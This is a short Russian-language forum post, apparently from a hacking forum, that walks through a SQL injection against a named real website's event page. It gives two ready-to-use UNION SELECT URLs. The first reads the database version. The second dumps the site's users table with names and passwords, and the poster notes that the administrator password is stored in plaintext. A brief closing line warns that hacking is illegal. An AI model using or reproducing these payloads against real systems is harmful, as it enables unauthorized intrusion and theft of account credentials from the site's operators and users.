2
Assembler, не знаю насчет поиска (проверять лениво было), но на сайте была лобовая инъекция в параметре id в index.php. Вот, кстати, и она:
Код:
http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+VERSION(),2,3/*
Версия БД 5 - можно свободно извлечь таблицы и столбцы.
Идем дальше: самой интересной таблицей, на мой взгляд, является "org.vs_users" с полями "u_id", "u_name", "u_pass", "u_level". Делаем запрос:
Код:
http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+concat_ws(0x3a,u_id,u_name,u_pass,u_level),2,3+FROM+org.vs_users/*
Видим аккаунт администратора, где пароль в незашифрованном виде:
Вот и все... Получился даже мини-FAQ

.
P.S. Лучше служить закону, чем нарушать его, взлом - зло! Помни о 272 статье УК РФ и о моральных принципах!